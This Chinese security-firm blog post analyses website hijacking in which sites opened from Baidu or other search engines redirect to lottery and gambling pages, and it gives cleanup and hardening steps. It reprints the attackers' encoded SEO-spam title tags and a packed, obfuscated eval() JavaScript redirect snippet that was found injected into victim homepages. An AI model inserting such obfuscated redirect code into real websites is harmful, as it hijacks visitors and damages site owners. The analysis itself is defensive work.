解决百度搜索引擎打开自己的网站却跳转到其他网站

最近一段时间,我们SINE安全公司一连接到数十个公司网站被跳转到彩票,博彩网

站上去,客户反映从百度搜索网站进去,直接跳转到彩票网站上,直接输入网址没有跳转,

导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给彩票网站做广告了,公司领

导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全

技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的

清除与漏洞修复,安全加固。关于网站被跳转到彩票、博彩网站的问题,整理一份详细的处

理过程,希望帮到更多遇到这种情况的站长,以及公司网站运营者。

网站被跳转彩票网站问题分析

我们SINE安全跟公司网站负责人进行了详细的服务器信息(服务器IP 远程端口 管理员账号

密码、SSH端口、root账号密码),网站信息包括FTP账号密码的对接,由安全部署部门技

术对网站的代码以及服务器系统进行缜密的安全检测与分析。

在整体的安全检测当中我们发现客户的网站都存在网站木马后门,包括php脚本木马,asp脚

本木马,jsp脚本木马,我们通常叫大马,可以对网站进行恶意篡改,上传,改名,下载,等

管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及

jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

由于之前客户网站总是被跳转到彩票、赌博网站,客户只是懂一些简单的代码,只能通过篡改

的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天网站又被跳转了,客户经

常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于网站存在漏洞,以及服务器安

全没有做好。我们SINE处理了成千上百的网站,总结的经验来看,网站首页被篡改的几率最大

,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:

<title>北京赛车投注平台_&#
21271;京赛车pk10网上开&
#25143;_北京赛车pk10登&#
24405;平台</title><meta name="keywords" content="北京&#1
12;k10开奖直播,pk1&#48
;开奖直播,北京赛车&#112
;k10开奖结果,北京&#3618
7;车pk10开奖直播,&#21271
;京赛车pk10历史记&#244
05;,北京赛车pk10投&#2788
0;网站,pk10网上开&#25143
;,pk10网上投注" />

以上代码就是被攻击者添加的加密的标题与描述,解密后发现内容是什么北京赛车,时时彩,

PK10等赌博内容。还有一个被攻击的特征就是在首页你会发现一段跳转的代码,该代码是根

据搜索引擎的特征来进行判断跳转,比如判断客户的访问来路是通过百度搜索,360搜索,搜

狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c
+29):c.toString(36))};if(!‘‘.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function
(e){retun d[e]}];e=function(){return‘\\w+‘};c=1;};while(c--)if(k[c])p=p.replace(new RegExp(‘\
\b‘+e(c)+‘\\b‘,‘g‘),k[c]);return p;}(‘l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\‘\\h\\2\\1\\4\\9\\3\\0
\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\
7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\‘);‘,29,29,‘x74|x
63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|windo
w|x75|x6e|x6c|x38|x3a|x76|x68‘.split(‘|‘),0,{}))

跳转到的彩票网站如下截图:

再一个攻击特征就是网站在百度里搜索,出现红色风险标识, 百度网址安全中心提醒您:

该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网

站直接被百度拦截,如下图所示:

百度网址安全中心提醒您:

该站点可能受到黑客攻击,部分页面已被非法篡改! 查看详情

您正在访问:http://*******.com/

该站点可能由于受到黑客攻击,部分页面已被非法篡改,可能会威胁到您的财产和信息安全

,建议您谨慎访问。

站点(http://******.com/)发现的非法篡改页面,可参考以下示例:

被黑网址快照1:http://********.com/011E...

被黑网址快照2:http://********.com/010S...

被黑网址快照3:http://********.com/004G...

针对以上网站被跳转攻击的特征,我们SINE对其进行全面的人工代码安全审计,以及网

站漏洞检测,网站木马后门清理,发现dedecms网站存在sql注入漏洞,以及xss获取管理

员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏

洞,针对上述漏洞我们进行了全面的修复,并做了网站安全部署,以及服务器安全部署,

网站文件防篡改部署。

防止网站被跳转的解决方法如下:

1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数

字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网

IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网

站漏洞。

相关链接:

1、https://www.sinesafe.com/article/20180803/tiaozhuan.html

2、http://www.seoyhw.com/seopx/seogh/54.html

原文地址:https://www.cnblogs.com/plus301/p/10828083.html

时间: 2024-10-11 04:45:35

解决百度搜索引擎打开自己的网站却跳转到其他网站的相关文章

手机访问PC网站自动跳转到手机网站代码(转)

4G时代,手机网站已经非常普遍了,一般手机网站都有一个二级域名来访问,比如 m.16css.com 如果手机直接访问www.16css.com 就是PC网站,在手机上浏览电脑版网站体验非常不好. 如果能够手机访问PC端电脑网站自动跳转到手机网站就好了: 代码如下: 将以下代码放在首页区 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 3

手机访问PC网站自动跳转到手机网站代码

第一 <SCRIPT LANGUAGE="JavaScript"> function mobile_device_detect(url) { var thisOS=navigator.platform; var os=new Array("iPhone","iPod","iPad","android","Nokia","SymbianOS","S

JS手机访问PC端网站自动跳转到手机端网站

<script type="text/javascript">//移动端url跳转,自定义部分开始    function mobile_device_detect(url) {        var thisOS = navigator.platform;        var os = new Array("iPhone", "iPod", "iPad", "android", "

网站快照被篡改劫持到其它网站如何解决

越来越多的网站被劫持,像跳转到彩piao网站,du博网站的情况时有发生,很多人可能都会经历过,电脑打开网站,以及手机打开移动端网站都会跳转到其他网站上去,这个就是网站被劫持跳转,那么网站被跳转的背后究竟是因为什么呢? ***者为何要劫持跳转到其他网站呢?SINE安全公司针对于这些安全情况,分析为什么网站首页会被篡改,会跳转,道高一尺魔高一丈,才能解决问题. 网站被劫持原因 利用别人网站的权重来做一些非法关键词(彩piao.bo菜.du博等关键词)的排名,也叫做黑帽SEO,***者的主要目的就是利

Baidu百度搜索引擎登录网站 - Blog透视镜

Baidu百度是中国的搜索引擎,有心经营中国市场的网友,自然不能错过,不过Google谷歌已经遭中国封锁,如果你的网站是用Blogger架设的,具有blogspot.com网域的,则会无法浏览. 阅读全文>> Baidu百度搜索引擎登录网站 - Blog透视镜

百度搜索引擎中的快照及快照更新机制

百度搜索引擎中的快照及快照更新机制 1.什么是百度快照? 如果无法打开某个搜索结果,或者打开速度特别慢,该怎么办?“百度快照”能帮您解决问题.每个被收录的网页,在百度上都存有一个纯文本的备份,称为“百度快照”.百度速度较快,您可以通过“快照”快速浏览页面内容. 不过,百度只保留文本内容,所以,那些图片.音乐等非文本信息,快照页面还是直接从原网页调用.如果您无法连接原网页,那么快照上的图片等非文本内容,会无法显示.所以,针对一些关闭掉或者无法访问的网站,如果想看到部分内容是可以通过百度快照实现的哦

谈《百度搜索引擎网页质量白皮书》

今年上半年,百度发布了<百度搜索引擎网页质量白皮书>,官方给出的发布理由是"此次推出<网页质量白皮书>,目的是开放百度在网页质量方面的判断标准,给站长提供参考,希望有更多.更优质的内容产生,满足搜索引擎用户的需求,同时为站长带来流量,实现共赢." 几乎可以肯定,用户在浏览网页时,使用最多的网站,绝大多数是搜索引擎,如百度.搜狗.360以及现在几乎没法用的谷歌.用户将自己的需求传递给搜索引擎,搜索引擎帮助用户在整个网页库中搜寻用户希望知道的信息,并将网页链接呈现给

百度搜索引擎排名原理、因素

再有五六天就开学了,查找有关搜索引擎排名,以下这篇文章还是比较不错的,先赞一个^_^! 搜索引擎排名定义: 在搜索引擎里输入一个关键字,通常得到很多搜索结果,这些搜索结果的排名有先后之分,这就是搜索引擎排名 搜索引擎的排名原理 搜索引擎优化简称SEO,指的是在符合用户友好性及搜索引擎算法的基础上,使用网站内或者网站外的优化手段,使网站在搜索引擎的关键词排名提高,从而获得目标搜索流量,进而建立直接销售或建立网络品牌. 搜索引擎的排名基本上分为四个步骤: 1. 爬行和抓取 搜索引擎派出一个能够在网上

让GitHub Pages博客支持百度搜索引擎收录

原文链接:http://tabalt.net/blog/make-blog-support-baidu-search-engine/本博文章如无说明均为原创,转载时请注明以上链接 GitHub Pages搭建的网站,在百度搜索引擎访问的时候,经常性的会返回 403 forbidden,从而百度会认为网站访问不稳定,对网站降权,甚至K站. 要想解决这个问题,只有买个VPS自己撘一个jekyll解析博客了.但是我的域名没有备案,单纯用国外的VPS,用户访问起来也会有慢的问题,毕竟Github Pag